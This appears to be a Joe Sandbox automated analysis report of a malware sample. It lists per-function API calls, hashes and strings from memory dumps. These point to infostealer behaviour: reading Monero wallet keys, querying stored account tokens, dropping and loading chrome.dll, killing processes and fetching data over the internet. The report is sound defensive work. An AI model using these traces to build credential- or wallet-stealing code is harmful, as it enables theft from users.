                                    • Opcode ID: f74ed96c5e47721c065bdb3a96a07452ebbd72ea5af0fc22d19d14e9bab8c6ff
                                    • Instruction ID: 5f643882207a73cb6cd665166776f0bf963e2fa0530b4180f598ed93c7f6c2ce
                                    • Opcode Fuzzy Hash: f74ed96c5e47721c065bdb3a96a07452ebbd72ea5af0fc22d19d14e9bab8c6ff
                                    • Instruction Fuzzy Hash: A44198B6900108BBDF14EBA0EC56FEE733DAB99700F404568F71556181FBB55A888BE2
                                    Function 001A7820 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 43registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001A7834
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A783B
                                    • RegOpenKeyExA.ADVAPI32(80000002,00E1B770,00000000,00020119,00000000), ref: 001A786D
                                    • RegQueryValueExA.ADVAPI32(00000000,00E2E3E0,00000000,00000000,?,000000FF), ref: 001A788E
                                    • RegCloseKey.ADVAPI32(00000000), ref: 001A7898
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11$
                                    • API String ID: 3225020163-442948342
                                    • Opcode ID: fc262d6d65a10e21136244a94961cdc5bddd13fcf33fd846ed2a4d8c4813631c
                                    • Instruction ID: 54ae30089317973c07cbef6b0d4a1227df0077c4ac4cc3e65889f5232f4fb75e
                                    • Opcode Fuzzy Hash: fc262d6d65a10e21136244a94961cdc5bddd13fcf33fd846ed2a4d8c4813631c
                                    • Instruction Fuzzy Hash: 13016279A08305BBEB00DBE4DD59FAE7778EB49B04F0041A9FA04E7280E7B49A00CB55
                                    Function 0019BA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                    • lstrlen.KERNEL32(00000000), ref: 0019BC6F
                                      • Part of subcall function 001A8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001A8FE2
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 0019BC9D
                                    • lstrlen.KERNEL32(00000000), ref: 0019BD75
                                    • lstrlen.KERNEL32(00000000), ref: 0019BD89
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 3073930149-1079375795
                                    • Opcode ID: fd93b1a5a5bcb453e68406a543787ea03103185b3a029e3ce18c4098d04bf3dd
                                    • Instruction ID: 5f1d05b247e9bc57be89902df35014d914ec5b77d09630ac702014a9f3a54153
                                    • Opcode Fuzzy Hash: fd93b1a5a5bcb453e68406a543787ea03103185b3a029e3ce18c4098d04bf3dd
                                    • Instruction Fuzzy Hash: 57B16076910208ABCF54FBA0DDA6EEE7379AF65304F804568F50663191EF346A48CB72
                                    Function 001A6A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: *
                                    • API String ID: 1494266314-163128923
                                    • Opcode ID: ff5df5c030229bfca69272136a85b6d2ff6c745b3d95e51d0a02742f6d863976
                                    • Instruction ID: e4d68bdf5ef5e433867da7e46e1b563409cae51dbc2eb06c0abc2a99120c1893
                                    • Opcode Fuzzy Hash: ff5df5c030229bfca69272136a85b6d2ff6c745b3d95e51d0a02742f6d863976
                                    • Instruction Fuzzy Hash: D4F0823190C209EFD3449FE1EC0979CBBB0EB0670BF1141A6F61A97290E6B84A80DB56
                                    Function 001A08A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001A9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,001A08DC,C:\ProgramData\chrome.dll), ref: 001A9871
                                      • Part of subcall function 0019A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0019A098
                                    • StrCmpCA.SHLWAPI(00000000,00E28F30), ref: 001A0922
                                    • StrCmpCA.SHLWAPI(00000000,00E29080), ref: 001A0B79
                                    • StrCmpCA.SHLWAPI(00000000,00E290C0), ref: 001A0A0C
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                    • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 001A0C35
                                    Strings
                                    • C:\ProgramData\chrome.dll, xrefs: 001A0C30
                                    • C:\ProgramData\chrome.dll, xrefs: 001A08CD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                    • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                    • API String ID: 585553867-663540502
                                    • Opcode ID: a3bb374323a1f743d38ebe04cd1108ca8decff69a893ced510610513704fd8c8
                                    • Instruction ID: 1d8669576ccd9df144d04a2def7a4e6801621d5a3d0074d4467410cf124e87a7
                                    • Opcode Fuzzy Hash: a3bb374323a1f743d38ebe04cd1108ca8decff69a893ced510610513704fd8c8
                                    • Instruction Fuzzy Hash: 99A176757002089FCF28EF64D996EED77BAAF95300F50856DE40A9F251EB30DA05CB92
                                    Function 00199E30 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 163stringsleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001A8CF0: GetSystemTime.KERNEL32(001B0E1B,00E2AB38,001B05B6,?,?,001913F9,?,0000001A,001B0E1B,00000000,?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001A8D16
                                    • wsprintfA.USER32 ref: 00199E7F
                                    • lstrcat.KERNEL32(00000000,?), ref: 00199F03
                                    • lstrcat.KERNEL32(00000000,?), ref: 00199F17
                                    • lstrcat.KERNEL32(00000000,001B12D8), ref: 00199F29
                                    • lstrcpy.KERNEL32(?,00000000), ref: 00199F7C
                                    • Sleep.KERNEL32(00001388), ref: 0019A013
                                      • Part of subcall function 001A99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001A99C5
                                      • Part of subcall function 001A99A0: Process32First.KERNEL32(0019A056,00000128), ref: 001A99D9
                                      • Part of subcall function 001A99A0: Process32Next.KERNEL32(0019A056,00000128), ref: 001A99F2
                                      • Part of subcall function 001A99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 001A9A4E
                                      • Part of subcall function 001A99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 001A9A6C
                                      • Part of subcall function 001A99A0: CloseHandle.KERNEL32(00000000), ref: 001A9A79
                                      • Part of subcall function 001A99A0: CloseHandle.KERNEL32(0019A056), ref: 001A9A88
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                    • String ID: D
                                    • API String ID: 531068710-2746444292
                                    • Opcode ID: 9136fbadb7a1a96f22a6bd35fcbe6d1f637c1f79373019b685dd894fc69f3954
                                    • Instruction ID: 1536a6a9748e6c66b1ce7da7e73394015beb906b49d4a79fac975095b5ae3dca
                                    • Opcode Fuzzy Hash: 9136fbadb7a1a96f22a6bd35fcbe6d1f637c1f79373019b685dd894fc69f3954
                                    • Instruction Fuzzy Hash: 7C5196B5944308ABEB20DB60DC46FDA7378AF55704F004598F60DAB2C1EB75AB84CF55
                                    Function 0020F9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                    Download Yara Rule
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 0020FA1F
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0020FA27
                                    • _ValidateLocalCookies.LIBCMT ref: 0020FAB0
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0020FADB
                                    • _ValidateLocalCookies.LIBCMT ref: 0020FB30
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                    • Instruction ID: b81f647ec6f2a97b4f577288ae448326794c7e6d30b079ba4cd9e42da3d42ca5
                                    • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                    • Instruction Fuzzy Hash: 5041C530A20309DFCF60DF68C980A9D7BB5BF49324F148165E818AB793D7719961CF91
                                    Function 00195000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0019501A
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00195021
                                    • InternetOpenA.WININET(001B0DE3,00000000,00000000,00000000,00000000), ref: 0019503A
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00195061
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00195091
                                    • InternetCloseHandle.WININET(?), ref: 00195109
                                    • InternetCloseHandle.WININET(?), ref: 00195116
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                    • String ID:
                                    • API String ID: 3066467675-0
                                    • Opcode ID: efd2f317ff832b2768f90f87b80c170ec23fe01bdbdfe8cffd6314096e30223e
                                    • Instruction ID: c2564f54546033a212dd082d2135b0f15afd63b02a5e62f2aa098b237bd0ea61
                                    • Opcode Fuzzy Hash: efd2f317ff832b2768f90f87b80c170ec23fe01bdbdfe8cffd6314096e30223e
                                    • Instruction Fuzzy Hash: 593118B4A40218ABDB24CF54CC85BDCB7B5AB48304F1081E9FA09A7280D7B06EC58F99
                                    Function 001A8290 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00E2E560,00000000,?,001B0E14,00000000,?,00000000), ref: 001A82C0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A82C7
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 001A82E8
                                    • wsprintfA.USER32 ref: 001A833C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2922868504-3474575989
                                    • Opcode ID: e83216907a5e4acf3d672ab18926580dcacde1ba317adc92fdde50cfc48c9253
                                    • Instruction ID: 0d9d704777dc0e4a504708e1f2dfc944404e5f26e77d9af589651dabb4a9c364
                                    • Opcode Fuzzy Hash: e83216907a5e4acf3d672ab18926580dcacde1ba317adc92fdde50cfc48c9253
                                    • Instruction Fuzzy Hash: AA214AB1E44208ABDB00DFD5DC49FAEBBB8FB45B04F104519F605BB280D7B899008BA9
                                    Function 001A856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 001A85B6
                                    • wsprintfA.USER32 ref: 001A85E9
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 001A860B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 001A861C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 001A8629
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                    • RegQueryValueExA.ADVAPI32(00000000,00E2E470,00000000,000F003F,?,00000400), ref: 001A867C
                                    • lstrlen.KERNEL32(?), ref: 001A8691
                                    • RegQueryValueExA.ADVAPI32(00000000,00E2E4E8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,001B0B3C), ref: 001A8729
                                    • RegCloseKey.ADVAPI32(00000000), ref: 001A8798
                                    • RegCloseKey.ADVAPI32(00000000), ref: 001A87AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
